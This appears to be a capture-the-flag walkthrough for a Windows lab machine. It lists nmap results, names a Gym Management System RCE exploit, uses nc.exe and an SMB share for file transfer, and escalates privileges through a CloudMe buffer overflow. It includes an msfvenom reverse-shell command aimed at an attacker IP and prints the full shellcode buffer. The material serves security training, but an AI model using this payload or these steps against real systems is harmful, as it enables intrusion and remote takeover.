PORT     STATE SERVICE    VERSION

7680/tcp open  pando-pub?

8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

|_http-open-proxy: Proxy might be redirecting requests

|_http-title: mrb3n's Bro Hut

Site is running Gym management system 1.0 which has a RCE vuln

https://www.exploit-db.com/exploits/48506
 

The shell is very buggy so we cannot leave this directory but we can use dir to read through different directories

I later found out we can upload nc.exe to the box to get an actual shell

we fine this interesting file named passwords.txt(this was nothing)

We want to setup an smb share to transfer files to the target

smbserver.py share . -smb2support -username df -password df

Priv esc is a buffer overflow(this took forever because port 8888 would not run so you essentially just had to sit there forever and wait for the port to listen)

The buffer overflow exploit is for Cloudme_1112.exe(48389.py)

We create the buffer overflow with msfvenom

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1337 -b '\x00\x0A\x0D' -f python

'\x00\x0A\x0D' this comes from the exploit and the creator of the overflow. The rest is typical msfvenom stuff

This gives us the actual overflow command which contains a reverse shell

###########

buf =  b""

buf += b"\xba\xc9\x24\xd4\x9d\xda\xd5\xd9\x74\x24\xf4\x58"

buf += b"\x33\xc9\xb1\x52\x31\x50\x12\x83\xe8\xfc\x03\x99"

buf += b"\x2a\x36\x68\xe5\xdb\x34\x93\x15\x1c\x59\x1d\xf0"

buf += b"\x2d\x59\x79\x71\x1d\x69\x09\xd7\x92\x02\x5f\xc3"

buf += b"\x21\x66\x48\xe4\x82\xcd\xae\xcb\x13\x7d\x92\x4a"

buf += b"\x90\x7c\xc7\xac\xa9\x4e\x1a\xad\xee\xb3\xd7\xff"

buf += b"\xa7\xb8\x4a\xef\xcc\xf5\x56\x84\x9f\x18\xdf\x79"

buf += b"\x57\x1a\xce\x2c\xe3\x45\xd0\xcf\x20\xfe\x59\xd7"

buf += b"\x25\x3b\x13\x6c\x9d\xb7\xa2\xa4\xef\x38\x08\x89"

buf += b"\xdf\xca\x50\xce\xd8\x34\x27\x26\x1b\xc8\x30\xfd"

buf += b"\x61\x16\xb4\xe5\xc2\xdd\x6e\xc1\xf3\x32\xe8\x82"

buf += b"\xf8\xff\x7e\xcc\x1c\x01\x52\x67\x18\x8a\x55\xa7"

buf += b"\xa8\xc8\x71\x63\xf0\x8b\x18\x32\x5c\x7d\x24\x24"

buf += b"\x3f\x22\x80\x2f\xd2\x37\xb9\x72\xbb\xf4\xf0\x8c"

buf += b"\x3b\x93\x83\xff\x09\x3c\x38\x97\x21\xb5\xe6\x60"

buf += b"\x45\xec\x5f\xfe\xb8\x0f\xa0\xd7\x7e\x5b\xf0\x4f"

buf += b"\x56\xe4\x9b\x8f\x57\x31\x0b\xdf\xf7\xea\xec\x8f"

buf += b"\xb7\x5a\x85\xc5\x37\x84\xb5\xe6\x9d\xad\x5c\x1d"

buf += b"\x76\xd8\xaa\x13\x80\xb4\xa8\x2b\x89\x7d\x24\xcd"

buf += b"\xfb\x6d\x60\x46\x94\x14\x29\x1c\x05\xd8\xe7\x59"

buf += b"\x05\x52\x04\x9e\xc8\x93\x61\x8c\xbd\x53\x3c\xee"

buf += b"\x68\x6b\xea\x86\xf7\xfe\x71\x56\x71\xe3\x2d\x01"

buf += b"\xd6\xd5\x27\xc7\xca\x4c\x9e\xf5\x16\x08\xd9\xbd"

buf += b"\xcc\xe9\xe4\x3c\x80\x56\xc3\x2e\x5c\x56\x4f\x1a"

buf += b"\x30\x01\x19\xf4\xf6\xfb\xeb\xae\xa0\x50\xa2\x26"

buf += b"\x34\x9b\x75\x30\x39\xf6\x03\xdc\x88\xaf\x55\xe3"

buf += b"\x25\x38\x52\x9c\x5b\xd8\x9d\x77\xd8\xe8\xd7\xd5"

buf += b"\x49\x61\xbe\x8c\xcb\xec\x41\x7b\x0f\x09\xc2\x89"

buf += b"\xf0\xee\xda\xf8\xf5\xab\x5c\x11\x84\xa4\x08\x15"

buf += b"\x3b\xc4\x18"

##################

We edit the buffer overflow file to add our own command in it

We also have to add right below the payload

payload = buf

Once we run this we will get a shell as admin